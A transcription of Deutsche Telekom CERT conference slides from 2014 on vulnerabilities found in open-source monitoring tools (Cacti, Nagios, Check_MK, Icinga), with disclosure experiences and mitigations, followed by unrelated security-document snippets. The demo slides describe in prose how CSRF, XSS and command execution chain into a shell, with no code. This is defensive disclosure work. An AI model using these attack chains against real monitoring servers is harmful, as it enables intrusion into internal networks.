OSMOSIS. Open Source Monitoring Security Issues HACKITO ERGO SUM 2014 / April 2014 / Paris
|
|
- Amber Griffin
- 8 years ago
- Views:
Transcription
1 OSMOSIS Open Source Monitoring Security Issues HACKITO ERGO SUM 2014 / April 2014 / Paris
2 AGENDA Who are we? Open Source Monitoring Software Results Demonstration Responses Mitigations and conclusion 4/25/14 2
3 DEUTSCHE TELEKOM PROFILE COSTUMERS & MARKETS FACTS & FIGURES Customers >141 m mobile customers >32 m fixed-line customers/ >17 m broadband customers rd. 3 m (IP) TV customers About 2 m workstation systems marketed Markets Presence in 50 countries Deutschland, Europa, USA: using our own infrastructur T-Systems: globale presence & alliances via partners Source: DT annual report to shareholders 2012/TMUS annual report to shareholders 2012 Telekom in figures Revenue 58.7 bn Adjusted Ebitda 18.7 bn Free cash flow 6.4 bn Among the top100 companies worldwide (#75 in 2012 Fortune500 list) Employees & responsibility Employees worldwide: 235, 000 9,000 trainees und cooperative degree students in Germany Pioneer of social issues (pomotion of woman, data privacy, climate protection etc.) 4/25/14 3
4 DEUTSCHE TELEKOM GROUP INFORMATION SECURITY Security levels Security strategies Standards Consulting Innovation Security requirements Security requirements Privacy & Security Assessment (PSA) Deutsche Telekom Cyber Emergency Response Team (CERT) Implementation of measures Technology Testing Abuse-Handling Incident management Intelligente Netzlösungen 4/25/14 4
5 OPEN SOURCE MONITORING SOFTWARE OVERVIEW SUMMARY Critical function in a corporate network Lets you know how well the network is running End-to-end monitoring for services up to detailed hardware view JOINT FUNCTIONS IN THIS CASE Web based solution Agent based OUT OF SCOPE No IDS / IPS No commercial solutions No security monitoring 4/25/14 5
6 OPEN SOURCE MONITORING SOFTWARE THREATS Ubiquitous component in network environments Centralized access to multiple networks Usually position deep in the internal network (as in: semi-trusted network) Used in nearly each environment (from small business, over mid range up to enterprises) MTAACA (machine that acts as client attack) and CTAMTAACA (clients that access machines that act as clients attack) 4/25/14 6
7 OPEN SOURCE MONITORING SOFTWARE RISKS A more valuable target than perimetric systems Input data parsing (logfiles, SNMP, traps,...) Web GUIs (OWASP Top 10 anyone?) Some have home-brew agents on EVERY system Potential access to a lot of components in the perimeter and internal network 4/25/14 7
8 OPEN SOURCE MONITORING SOFTWARE HOW IS IT IMPLEMENTED TYPICALLY? OWN CHECKS SNMP 4/25/14 8
9 OPEN SOURCE MONITORING SOFTWARE WHAT WE COVERED This is not an academic talk - we are talking about actual experience Open Source tools are easy to audit (kinda) Everyone has the chance to audit their own solution Focus on market leading / industry standard software 4/25/14 9
10 OPEN SOURCE MONITORING SOFTWARE WHAT WE DID NOT COVER No commercial / closed source solutions Architectural software flaws Critical features which should be disabled anyways e.g. nrpe.cfg dont_blame_nrpe No additional plugins, features, add-ons Not the (home brewed) agents itself 4/25/14 10
11 OPEN SOURCE MONITORING SOFTWARE TOOLS WE COVERED CACTI network graphing solution ; frontend is completely PHP driven src: NAGIOS Nagios Is The Industry Standard In IT Infrastructure Monitoring src: CHECK_MK (NAGIOS ADD-ON) Check_MK is a comprehensive add-on for the famous Open Source monitoring software Nagios src: ICINGA Icinga is an enterprise grade open source monitoring system src: 4/25/14 11
12 OPEN SOURCE MONITORING SOFTWARE PUBLICLY KNOWN INCIDENTS CVE Remote Buffer Overflow Nagios Hetzner (06/2013) 4/25/14 12
13 OPEN SOURCE MONITORING SOFTWARE OTHER INTERESTING INFORMATION Public Buffer Overflow in CACTI (since 10/2013) NRPE - Remote command exec (04/2014) 4/25/14 13
14 RESULTS OVERALL Critical issues were found in ALL audited solutions Memory corruption Buffer/Heap Overflows Off-by-one s CSRF XSS eval-processing untrusted input Remote Code Execution Arbitrary file access Many web based bugs, as all the solutions use web GUIs 4/25/14 14
15 RESULTS DETAILED VIEW (Cacti) Version 3.5.0b 1.9.1b 1.2.2p a Number of Findings CVSS 2 Score (highest finding) 4.9 AV:N/AC:M/Au::S/C:P/I:N/A:P 8.5 AV:N/AC:M/Au:S/C:C/I:C/A:C 8.5 AV:N/AC:M/Au:S/C:C/I:C/A:C 8.5 AV:N/AC:M/Au:S/C:C/I:C/A:C Criticality medium high high high Number of open findings 1* 0 1** 3 Announcement to vendor / developer 5th Dec nd Dec th Oct th Oct Bug Fix Release 3.5.x*, Public DTAG CERT Advisory Remarks DTC- A * Bug fixes in the source code only available. No updates release available , 1.9.4, or latest release DTC- A p1, 1.2.5i2 or latest release DTC- A ** exec of python code within WATO n/a DTC- A Confidential Christian Sielaff / OSMOSIS
16 DEMONSTRATION CAN WE GET A SHELL? 4/25/14 16
17 DEMONSTRATION NETWORK OVERVIEW Hacker Terminal Server Cacti / Check_MK Administrator Confidential Christian Sielaff / OSMOSIS
18 DEMONSTRATION CACTI Bugs: cross site request forgery command like exec Hacker Cacti Administrator Confidential Christian Sielaff / OSMOSIS
19 DEMONSTRATION CACTI Bugs: cross site request forgery command like exec Get executed on Cacti server if: Administrator clicks on a link or Visit a malicious web site Hacker Cacti Administrator Confidential Christian Sielaff / OSMOSIS
20 DEMONSTRATION CACTI Bugs: cross site request forgery command like exec Get executed on Cacti server if: Administrator clicks on a link, or Visit a malicious web site Pro: Get a shell Con: Need to know the Cacti URL Admins needs to access link or site with link to trigger exploit Outgoing connections my be restricted Admins needs to logged in Hacker Cacti Administrator Confidential Christian Sielaff / OSMOSIS
21 DEMONSTRATION CACTI Bugs: cross site request forgery command like exec Get executed on Cacti server if: Administrator clicks on a link, or Visit a malicious web site Pro: Get a shell Con: Need to know the Cacti URL Admins needs to access link or site with link to trigger exploit Outgoing connections my be restricted Admins needs to logged in not really let s brute force the Admin account J Hacker Cacti Administrator Confidential Christian Sielaff / OSMOSIS
22 DEMONSTRATION CHECK_MK Hacker Terminal Server Check_MK Administrator Confidential Christian Sielaff / OSMOSIS
23 DEMONSTRATION CHECK_MK Bugs: cross site request forgery command like exec cross site scripting Hacker Terminal Server Check_MK Administrator Confidential Christian Sielaff / OSMOSIS
24 DEMONSTRATION CHECK_MK Bugs: cross site request forgery command like exec cross site scripting What is the problem: Exploits a feature in WATO Uploads and exec a snapshot Snapshot contains plain python code Hacker Terminal Server Check_MK Administrator Confidential Christian Sielaff / OSMOSIS
25 DEMONSTRATION CHECK_MK Bugs: cross site request forgery command like exec cross site scripting What is the problem: Exploits a feature in WATO Uploads and exec a snapshot Snapshot contains plain python code Pro: Get a shell Con: Need to know the Check_MK URL Admins needs to access link or site with link to trigger exploit Outgoing connections my be restricted Admins needs to logged in Hacker Terminal Server Check_MK Administrator Confidential Christian Sielaff / OSMOSIS
26 DEMONSTRATION CHECK_MK Bugs: cross site request forgery command like exec cross site scripting What can we do better? Use the agent on a system Re-use existing connections Hacker Terminal Server Check_MK Administrator Confidential Christian Sielaff / OSMOSIS
27 DEMONSTRATION CHECK_MK Bugs: cross site request forgery command like exec cross site scripting What can we do better? Use the agent on a system Re-use existing connections Hacker Terminal Server Check_MK Administrator Confidential Christian Sielaff / OSMOSIS
28 DEMONSTRATION CHECK_MK Bugs: cross site request forgery command like exec cross site scripting What can we do better? Use the agent on a system Re-use existing connections Pro: Get a shell URL is no longer needed Administrator not need a link to click Triggers when the Administrator logs in Using existing connections Con: Need (privileged) access to a monitored system Hacker Terminal Server Check_MK Administrator Confidential Christian Sielaff / OSMOSIS
29 DEMONSTRATION CHECK_MK Bugs: cross site request forgery command like exec cross site scripting What can we do also? Just a simple SSH login? Hacker Terminal Server Check_MK Administrator Confidential Christian Sielaff / OSMOSIS
30 DEMONSTRATION CHECK_MK Bugs: cross site request forgery command like exec cross site scripting What can we do also? Just a simple SSH login? A XSS triggers a CSRF triggers an Hacker Terminal Server Check_MK Administrator Confidential Christian Sielaff / OSMOSIS
31 DEMONSTRATION CHECK_MK Bugs: cross site request forgery command like exec cross site scripting What can we do also? Just a simple SSH login? A XSS triggers a CSRF triggers an upload that triggers a shell J Hacker Terminal Server Check_MK Administrator Confidential Christian Sielaff / OSMOSIS
32 DEMONSTRATION CHECK_MK Bugs: cross site request forgery command like exec cross site scripting What can we do also? Just a simple SSH login? A XSS triggers a CSRF triggers an upload that triggers a shell J Pro: Get a shell URL is no longer needed Administrator not need a link to click Triggers when the Administrator logs in Con: Logwatch feature (default installation is fair) Outgoing connections my be restricted Hacker Terminal Server Check_MK Administrator Confidential Christian Sielaff / OSMOSIS
33 DEMONSTRATION CAN WE GET A SHELL? YES J 4/25/14 33
34 RESPONSES CONTACT AND TIMELINES CONTACTING some developer without a contact option (expect a public mailing list is this a good idea in such case?) usually an contact is possible also with a privacy option Only Icinga provides an option for a private information sharing TIMELINE approximately six days from first response to a bug fix release well done! up to 85 days to a bug fix release up to nothing until now L ADVISORIES post flaws to Bugtraq on 24 th of March get first responses regarding open findings 28 th / 31 st of March 4/25/14 34
35 RESPONSES FEEDBACK WHAT IS OWASP?" It s 2014, guys! THIS IS A FEATURE" Yes, and a backdoor! WHAT TOOLS DID YOU USE FOR SCANNING? Hint: None, we had the source code Duh! WHY SHOULD WE FIX WHAT YOU SEE AS A SECURITY PROBLEM? WE NEVER ASKED FOR THIS AUDIT! Approximately Right. Remember it s open source? Open as in: I audit this code as much as I want to? - As in: No response at all after issues were committed to developer. 4/25/14 35
36 RESPONSES DISCLOSURE SECURITY FIXES Change log or Release notes _never_ mentions security fixes explicitly No hints or information on the developer Web sites! CVE _Common_ never heard about that CREDITS What s that? BUT THERE ARE SOME PROFESSIONALS The Icinga Team has published bug fix releases (incl. back ports), ordered CVE numbers and assign the issues as Security issues. MANY THANKS AND WELL DONE! 4/25/14 36
37 MITIGATIONS BEST PRACTICES BEST PRACTICES Consider Icinga and Nagios Security Guidelines e.g. Nothing similar available for Cacti and Check_MK GENERAL BASICS Patching and regular updates OS and middleware hardening Minimal rights on application level, but also on operating system level Remove critical features (e.g. WATO in Check_MK) Passwords 4/25/14 37
38 MITIGATIONS SEGREGATION ON NETWORK LEVEL Do not place such systems flat in your corporate network Consider segregation based on functions, e.g. own monitoring systems for dedicated services No internet for the admin workstations and monitoring system (incl. ICMP, DNS, NTP, ) ON APPLICATION LEVEL Segregate user and roles 4/25/14 38
39 MITIGATIONS ARCHITECTURE AGENT BASED MONITORING Needs privileged rights to get all information and listen to the network (often unauthenticated) Security of agents should be discussed separately e.g. CHECK VIA SSH Must be secured carefully via SSHd configuration otherwise direct shell login SOLUTION Change the communication direction Based on Check_MK s agent, it s just a configuration no additional software needed 4/25/14 39
40 MITIGATIONS ARCHITECTURE HOW IT WORKS Run Check_MK agent locally and pipe output to a file 4/25/14 40
41 MITIGATIONS ARCHITECTURE HOW IT WORKS Run Check_MK agent locally and pipe output to a file Secure transfer, e.g. via SCP/SFTP 4/25/14 41
42 MITIGATIONS ARCHITECTURE HOW IT WORKS Run Check_MK agent locally and pipe output to a file Secure transfer, e.g. via SCP/SFTP Configure Check_MK Configuration & Check Engine to get information from a local file 4/25/14 42
43 MITIGATIONS ARCHITECTURE OWN CHECKS 4/25/14 43
44 CONCLUSION Take care about your used solutions incl. additional features, add-ons, plug ins, self written checks and architecture. When it named Open Source, it does not mean it is secure itself! In general Open Source Monitoring solutions are not more or less secure than commercial ones. Strong isolation of administrator workstations and your monitoring system as Check OWASP regularly! 4/25/14 44
45
ArcGIS Server Security Threats & Best Practices 2014. David Cordes Michael Young
ArcGIS Server Security Threats & Best Practices 2014 David Cordes Michael Young Agenda Introduction Threats Best practice - ArcGIS Server settings - Infrastructure settings - Processes Summary Introduction
More informationCreating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011 Agenda Evolving Threats Operating System Application User Generated Content JPL s Application Security Program Securing
More informationANNEXURE-1 TO THE TENDER ENQUIRY NO.: DPS/AMPU/MIC/1896. Network Security Software Nessus- Technical Details
Sub: Supply, Installation, setup and testing of Tenable Network Security Nessus vulnerability scanner professional version 6 or latest for scanning the LAN, VLAN, VPN and IPs with 3 years License/Subscription
More informationThick Client Application Security
Thick Client Application Security Arindam Mandal (arindam.mandal@paladion.net) (http://www.paladion.net) January 2005 This paper discusses the critical vulnerabilities and corresponding risks in a two
More informationMedical Device Security Health Imaging Digital Capture. Security Assessment Report for the Kodak Capture Link Server V1.00
Medical Device Security Health Imaging Digital Capture Security Assessment Report for the Kodak Capture Link Server V1.00 Version 1.0 Eastman Kodak Company, Health Imaging Group Page 1 Table of Contents
More informationThe purpose of this report is to educate our prospective clients about capabilities of Hackers Locked.
This sample report is published with prior consent of our client in view of the fact that the current release of this web application is three major releases ahead in its life cycle. Issues pointed out
More informationPenetration Testing Report Client: Business Solutions June 15 th 2015
Penetration Testing Report Client: Business Solutions June 15 th 2015 Acumen Innovations 80 S.W 8 th St Suite 2000 Miami, FL 33130 United States of America Tel: 1-888-995-7803 Email: info@acumen-innovations.com
More informationWhat is Web Security? Motivation
brucker@inf.ethz.ch http://www.brucker.ch/ Information Security ETH Zürich Zürich, Switzerland Information Security Fundamentals March 23, 2004 The End Users View The Server Providers View What is Web
More informationWeb application security
Web application security Sebastian Lopienski CERN Computer Security Team openlab and summer lectures 2010 (non-web question) Is this OK? int set_non_root_uid(int uid) { // making sure that uid is not 0
More informationKenna Platform Security. A technical overview of the comprehensive security measures Kenna uses to protect your data
Kenna Platform Security A technical overview of the comprehensive security measures Kenna uses to protect your data V2.0, JULY 2015 Multiple Layers of Protection Overview Password Salted-Hash Thank you
More informationMagento Security and Vulnerabilities. Roman Stepanov
Magento Security and Vulnerabilities Roman Stepanov http://ice.eltrino.com/ Table of contents Introduction Open Web Application Security Project OWASP TOP 10 List Common issues in Magento A1 Injection
More informationlocuz.com Professional Services Security Audit Services
locuz.com Professional Services Security Audit Services Today s Security Landscape Today, over 80% of attacks against a company s network come at the Application Layer not the Network or System layer.
More informationSecuring your Virtual Datacenter. Part 1: Preventing, Mitigating Privilege Escalation
Securing your Virtual Datacenter Part 1: Preventing, Mitigating Privilege Escalation Before We Start... Today's discussion is by no means an exhaustive discussion of the security implications of virtualization
More informationNixu SNS Security White Paper May 2007 Version 1.2
1 Nixu SNS Security White Paper May 2007 Version 1.2 Nixu Software Limited Nixu Group 2 Contents 1 Security Design Principles... 3 1.1 Defense in Depth... 4 1.2 Principle of Least Privilege... 4 1.3 Principle
More information1 hours, 30 minutes, 38 seconds Heavy scan. All scanned network resources. Copyright 2001, FTP access obtained
home Network Vulnerabilities Detail Report Grouped by Vulnerability Report Generated by: Symantec NetRecon 3.5 Licensed to: X Serial Number: 0182037567 Machine Scanned from: ZEUS (192.168.1.100) Scan Date:
More informationBlack Box Penetration Testing For GPEN.KM V1.0 Month dd "#$!%&'(#)*)&'+!,!-./0!.-12!1.03!0045!.567!5895!.467!:;83!-/;0!383;!
Sample Penetration Testing Report Black Box Penetration Testing For GPEN.KM V1.0 Month dd "#$%&'#)*)&'+,-./0.-121.030045.5675895.467:;83-/;0383; th, yyyy A&0#0+4*M:+:#&*#0%+C:,#0+4N:
More informationHost Hardening. Presented by. Douglas Couch & Nathan Heck Security Analysts for ITaP 1
Host Hardening Presented by Douglas Couch & Nathan Heck Security Analysts for ITaP 1 Background National Institute of Standards and Technology Draft Guide to General Server Security SP800-123 Server A
More informationA Decision Maker s Guide to Securing an IT Infrastructure
A Decision Maker s Guide to Securing an IT Infrastructure A Rackspace White Paper Spring 2010 Summary With so many malicious attacks taking place now, securing an IT infrastructure is vital. The purpose
More informationCS 356 Lecture 25 and 26 Operating System Security. Spring 2013
CS 356 Lecture 25 and 26 Operating System Security Spring 2013 Review Chapter 1: Basic Concepts and Terminology Chapter 2: Basic Cryptographic Tools Chapter 3 User Authentication Chapter 4 Access Control
More informationCloud Security:Threats & Mitgations
Cloud Security:Threats & Mitgations Vineet Mago Naresh Khalasi Vayana 1 What are we gonna talk about? What we need to know to get started Its your responsibility Threats and Remediations: Hacker v/s Developer
More informationUSM IT Security Council Guide for Security Event Logging. Version 1.1
USM IT Security Council Guide for Security Event Logging Version 1.1 23 November 2010 1. General As outlined in the USM Security Guidelines, sections IV.3 and IV.4: IV.3. Institutions must maintain appropriate
More informationPentests more than just using the proper tools
Pentests more than just using the proper tools Agenda 1. Information Security @ TÜV Rheinland 2. Penetration testing Introduction Evaluation scheme Security Analyses of web applications Internal Security
More informationHow to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering
How to break in Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering Time Agenda Agenda Item 9:30 10:00 Introduction 10:00 10:45 Web Application Penetration
More informationPentests more than just using the proper tools
Pentests more than just using the proper tools Agenda 1. Information Security @ TÜV Rheinland 2. Security testing 3. Penetration testing Introduction Evaluation scheme Security Analyses of web applications
More informationColumbia University Web Security Standards and Practices. Objective and Scope
Columbia University Web Security Standards and Practices Objective and Scope Effective Date: January 2011 This Web Security Standards and Practices document establishes a baseline of security related requirements
More informationSECURITY TRENDS & VULNERABILITIES REVIEW 2015
SECURITY TRENDS & VULNERABILITIES REVIEW 2015 Contents 1. Introduction...3 2. Executive summary...4 3. Inputs...6 4. Statistics as of 2014. Comparative study of results obtained in 2013...7 4.1. Overall
More informationHow to complete the Secure Internet Site Declaration (SISD) form
1 How to complete the Secure Internet Site Declaration (SISD) form The following instructions are designed to assist you in completing the SISD form that forms part of your Merchant application. Once completed,
More information8070.S000 Application Security
8070.S000 Application Security Last Revised: 02/26/15 Final 02/26/15 REVISION CONTROL Document Title: Author: File Reference: Application Security Information Security 8070.S000_Application_Security.docx
More informationOverview Commitment to Energy and Utilities Robert Held Sr. Systems Engineer Strategic Energy August 2015
Overview Commitment to Energy and Utilities Robert Held Sr. Systems Engineer Strategic Energy August 2015 Tripwire Evolution 18+ Years of Innovation 1997 Tripwire File System Monitoring from open source
More informationSecure Web Applications. The front line defense
Secure Web Applications The front line defense Agenda Web Application Security Threat Overview Exploiting Web Applications Common Attacks & Preventative techniques Developing Secure Web Applications -Security
More informationOverview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs
Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs Why Network Security? Keep the bad guys out. (1) Closed networks
More informationMedical Device Security Health Imaging Digital Capture. Security Assessment Report for the Kodak DR V2.0
Medical Device Security Health Imaging Digital Capture Security Assessment Report for the Kodak DR V2.0 Version 1.0 Eastman Kodak Company, Health Imaging Group Page 1 Table of Contents Table of Contents
More informationABC LTD EXTERNAL WEBSITE AND INFRASTRUCTURE IT HEALTH CHECK (ITHC) / PENETRATION TEST
ABC LTD EXTERNAL WEBSITE AND INFRASTRUCTURE IT HEALTH CHECK (ITHC) / PENETRATION TEST Performed Between Testing start date and end date By SSL247 Limited SSL247 Limited 63, Lisson Street Marylebone London
More informationHacking the WordpressEcosystem
Hacking the WordpressEcosystem About Me Dan Catalin VASILE Information Security Consultant Researcher / Writer / Presenter OWASP Romania Board Member Online presence http://www.pentest.ro dan@pentest.ro/
More informationWEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY
WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY www.alliancetechpartners.com WEB SECURITY CONCERNS THAT WEB VULNERABILITY SCANNING CAN IDENTIFY More than 70% of all websites have vulnerabilities
More informationAdobe Systems Incorporated
Adobe Connect 9.2 Page 1 of 8 Adobe Systems Incorporated Adobe Connect 9.2 Hosted Solution June 20 th 2014 Adobe Connect 9.2 Page 2 of 8 Table of Contents Engagement Overview... 3 About Connect 9.2...
More informationOracle Security Auditing
Introduction - Commercial Slide. RISK 2008, Oslo, Norway, April 23 rd 2008 Oracle Security Auditing By Pete Finnigan Written Friday, 25th January 2008 Founded February 2003 CEO Pete Finnigan Clients UK,
More informationOracle Security Auditing
RISK 2008, Oslo, Norway, April 23 rd 2008 Oracle Security Auditing By Pete Finnigan Written Friday, 25th January 2008 1 Introduction - Commercial Slide. Founded February 2003 CEO Pete Finnigan Clients
More informationPenetration Testing. NTS330 Unit 1 Penetration V1.0. February 20, 2011. Juan Ortega. Juan Ortega, juaorteg@uat.edu. 1 Juan Ortega, juaorteg@uat.
1 Penetration Testing NTS330 Unit 1 Penetration V1.0 February 20, 2011 Juan Ortega Juan Ortega, juaorteg@uat.edu 1 Juan Ortega, juaorteg@uat.edu 2 Document Properties Title Version V1.0 Author Pen-testers
More informationWHITE PAPER. FortiWeb and the OWASP Top 10 Mitigating the most dangerous application security threats
WHITE PAPER FortiWeb and the OWASP Top 10 PAGE 2 Introduction The Open Web Application Security project (OWASP) Top Ten provides a powerful awareness document for web application security. The OWASP Top
More informationJOOMLA SECURITY. ireland website design. by Oliver Hummel. ADDRESS Unit 12D, Six Cross Roads Business Park, Waterford City
JOOMLA SECURITY by Oliver Hummel ADDRESS Unit 12D, Six Cross Roads Business Park, Waterford City CONTACT Nicholas Butler 051-393524 089-4278112 info@irelandwebsitedesign.com Contents Introduction 3 Installation
More informationNorth Dakota 2013 IT Security Audit Vulnerability Assessment & Penetration Test Project Briefing
North Dakota 2013 IT Security Audit Vulnerability Assessment & Penetration Test Project Briefing Introduction ManTech Project Manager Mark Shaw, Senior Executive Director Cyber Security Solutions Division
More informationNeed for Database Security. Whitepaper
Whitepaper 2 Introduction The common factor in today s global economy where most of the business is done electronically via B2B [Business to Business] or via B2C [business to consumer] or other more traditional
More informationFINAL DoIT 04.01.2013- v.8 APPLICATION SECURITY PROCEDURE
Purpose: This procedure identifies what is required to ensure the development of a secure application. Procedure: The five basic areas covered by this document include: Standards for Privacy and Security
More informationSociety for Information Management
Society for Information Management The Projected Top 5 Security Issues of 2010 Steve Erdman CSO and Staff Security Consultant of SecureState Network +, MCP Precursor 2009 has been a difficult year in Information
More informationMedical Device Security Health Imaging Digital Capture. Security Assessment Report for the Kodak CR V4.1
Medical Device Security Health Imaging Digital Capture Security Assessment Report for the Kodak CR V4.1 Version 1.0 Eastman Kodak Company, Health Imaging Group Page 1 Table of Contents Table of Contents
More informationStephen Coty Director, Threat Research
Emerging threats facing Cloud Computing Stephen Coty Director, Threat Research Cloud Environments 101 Cloud Adoption is Gaining Momentum Cloud market revenue will increase at a 36% annual rate Analyst
More informationSECURITY ADVISORY. December 2008 Barracuda Load Balancer admin login Cross-site Scripting
SECURITY ADVISORY December 2008 Barracuda Load Balancer admin login Cross-site Scripting Discovered in December 2008 by FortConsult s Security Research Team/Jan Skovgren WARNING NOT FOR DISCLOSURE BEFORE
More informationHow To Set Up An Ip Firewall On Linux With Iptables (For Ubuntu) And Iptable (For Windows)
Security principles Firewalls and NAT These materials are licensed under the Creative Commons Attribution-Noncommercial 3.0 Unported license (http://creativecommons.org/licenses/by-nc/3.0/) Host vs Network
More informationReducing Application Vulnerabilities by Security Engineering
Reducing Application Vulnerabilities by Security Engineering - Subash Newton Manager Projects (Non Functional Testing, PT CoE Group) 2008, Cognizant Technology Solutions. All Rights Reserved. The information
More information05.0 Application Development
Number 5.0 Policy Owner Information Security and Technology Policy Application Development Effective 01/01/2014 Last Revision 12/30/2013 Department of Innovation and Technology 5. Application Development
More informationWhere every interaction matters.
Where every interaction matters. Peer 1 Vigilant Web Application Firewall Powered by Alert Logic The Open Web Application Security Project (OWASP) Top Ten Web Security Risks and Countermeasures White Paper
More informationHardening Joomla 1. HARDENING PHP. 1.1 Installing Suhosin. 1.2 Disable Remote Includes. 1.3 Disable Unneeded Functions & Classes
1. HARDENING PHP Hardening Joomla 1.1 Installing Suhosin Suhosin is a PHP Hardening patch which aims to protect the PHP engine and runtime environment from common exploits, such as buffer overflows in
More information3. Broken Account and Session Management. 4. Cross-Site Scripting (XSS) Flaws. Web browsers execute code sent from websites. Account Management
What is an? s Ten Most Critical Web Application Security Vulnerabilities Anthony LAI, CISSP, CISA Chapter Leader (Hong Kong) anthonylai@owasp.org Open Web Application Security Project http://www.owasp.org
More informationNessus scanning on Windows Domain
Nessus scanning on Windows Domain A little inside information and Nessus can go a long way By Sunil Vakharia sunilv@phreaker.net Version 1.0 4 November 2003 About this paper This paper is not a tutorial
More informationIntegrated Network Vulnerability Scanning & Penetration Testing SAINTcorporation.com
SAINT Integrated Network Vulnerability Scanning and Penetration Testing www.saintcorporation.com Introduction While network vulnerability scanning is an important tool in proactive network security, penetration
More informationPen Testing Methodology Gueststealer TomCat Zero Day Directory Traversal VASTO
Does vsphere really have some major issues? Recent Cases involving VMware Pen Testing Methodology Gueststealer TomCat Zero Day Directory Traversal VASTO Mitigation Techniques Future Concerns? VMware 80%
More informationClient logo placeholder XXX REPORT. Page 1 of 37
Client logo placeholder XXX REPORT Page 1 of 37 Report Details Title Xxx Penetration Testing Report Version V1.0 Author Tester(s) Approved by Client Classification Confidential Recipient Name Title Company
More informationVirtualization System Security
Virtualization System Security Bryan Williams, IBM X-Force Advanced Research Tom Cross, Manager, IBM X-Force Security Strategy 2009 IBM Corporation Overview Vulnerability disclosure analysis Vulnerability
More informationVulnerability Assessment and Penetration Testing
Vulnerability Assessment and Penetration Testing Module 1: Vulnerability Assessment & Penetration Testing: Introduction 1.1 Brief Introduction of Linux 1.2 About Vulnerability Assessment and Penetration
More informationWordPress Security Scan Configuration
WordPress Security Scan Configuration To configure the - WordPress Security Scan - plugin in your WordPress driven Blog, login to WordPress as administrator, by simply entering the url_of_your_website/wp-admin
More informationensuring security the way how we do it
ensuring security the way how we do it HUSTEF, 2015.11.18 Attila Tóth 1 Nokia Solutions and Networks 2014 Disclaimer The ideas, processes, tools are presented from a practitioner s point of view working
More informationHow To Manage Web Content Management System (Wcm)
WEB CONTENT MANAGEMENT SYSTEM February 2008 The Government of the Hong Kong Special Administrative Region The contents of this document remain the property of, and may not be reproduced in whole or in
More informationPanda Perimeter Management Console. Guide for Partners
Panda Perimeter Management Console Guide for Partners Copyright notice Panda Security 2014. All rights reserved. Neither the documents nor the programs that you may access may be copied, reproduced, translated
More informationThreat Modeling. Categorizing the nature and severity of system vulnerabilities. John B. Dickson, CISSP
Threat Modeling Categorizing the nature and severity of system vulnerabilities John B. Dickson, CISSP What is Threat Modeling? Structured approach to identifying, quantifying, and addressing threats. Threat
More informationDetecting Web Application Vulnerabilities Using Open Source Means. OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008
Detecting Web Application Vulnerabilities Using Open Source Means OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008 Kostas Papapanagiotou Committee Member OWASP Greek Chapter conpap@owasp.gr
More informationCourse: Information Security Management in e-governance. Day 1. Session 5: Securing Data and Operating systems
Course: Information Security Management in e-governance Day 1 Session 5: Securing Data and Operating systems Agenda Introduction to information, data and database systems Information security risks surrounding
More informationOut of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet
Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet March 8, 2012 Stephen Kost Chief Technology Officer Integrigy Corporation Phil Reimann Director of Business Development
More informationQuestion Name C 1.1 Do all users and administrators have a unique ID and password? Yes
Category Question Name Question Text C 1.1 Do all users and administrators have a unique ID and password? C 1.1.1 Passwords are required to have ( # of ) characters: 5 or less 6-7 8-9 Answer 10 or more
More informationSecuring OS Legacy Systems Alexander Rau
Securing OS Legacy Systems Alexander Rau National Information Security Strategist Sample Agenda 1 Today s IT Challenges 2 Popular OS End of Support & Challenges for IT 3 How to protect Legacy OS systems
More informationCYBERTRON NETWORK SOLUTIONS
CYBERTRON NETWORK SOLUTIONS CybertTron Certified Ethical Hacker (CT-CEH) CT-CEH a Certification offered by CyberTron @Copyright 2015 CyberTron Network Solutions All Rights Reserved CyberTron Certified
More informationCyber Security Scan Report
Scan Customer Information Scan Company Information Company: Example Name Company: SRC Security Research & Consulting GmbH Contact: Mr. Example Contact: Holger von Rhein : : Senior Consultant Telephone:
More informationSmart (and safe) Lighting:
Smart (and safe) Lighting: An Overview of Cyber Security October 29, 2015 Jason Brown CISO, Merit Network Agenda 2 The New Normal Discuss Methodologies of Security Recap Q & A Target Hack 3 40,000 credit
More informationKEN VAN WYK. Fundamentals of Secure Coding and how to break Software MARCH 19-23, 2007 RESIDENZA DI RIPETTA - VIA DI RIPETTA, 231 ROME (ITALY)
TECHNOLOGY TRANSFER PRESENTS KEN VAN WYK Fundamentals of Secure Coding and how to break Software MARCH 19-23, 2007 RESIDENZA DI RIPETTA - VIA DI RIPETTA, 231 ROME (ITALY) info@technologytransfer.it www.technologytransfer.it
More informationCCM 4350 Week 11. Security Architecture and Engineering. Guest Lecturer: Mr Louis Slabbert School of Science and Technology.
CCM 4350 Week 11 Security Architecture and Engineering Guest Lecturer: Mr Louis Slabbert School of Science and Technology CCM4350_CNSec 1 Web Server Security The Web is the most visible part of the net
More informationWeb Application Vulnerability Testing with Nessus
The OWASP Foundation http://www.owasp.org Web Application Vulnerability Testing with Nessus Rïk A. Jones, CISSP rikjones@computer.org Rïk A. Jones Web developer since 1995 (16+ years) Involved with information
More informationSitefinity Security and Best Practices
Sitefinity Security and Best Practices Table of Contents Overview The Ten Most Critical Web Application Security Risks Injection Cross-Site-Scripting (XSS) Broken Authentication and Session Management
More informationSecurity Testing and Vulnerability Management Process. e-governance
Security Testing and Vulnerability Management Process for e-governance Draft DEPARTMENT OF ELECTRONICS AND INFORMATION TECHNOLOGY Ministry of Communication and Information Technology, Government of India.
More informationDatabase Security Guide
Institutional and Sector Modernisation Facility ICT Standards Database Security Guide Document number: ISMF-ICT/3.03 - ICT Security/MISP/SD/DBSec Version: 1.10 Project Funded by the European Union 1 Document
More informationASL IT SECURITY BEGINNERS WEB HACKING AND EXPLOITATION
ASL IT SECURITY BEGINNERS WEB HACKING AND EXPLOITATION V 2.0 A S L I T S e c u r i t y P v t L t d. Page 1 Overview: Learn the various attacks like sql injections, cross site scripting, command execution
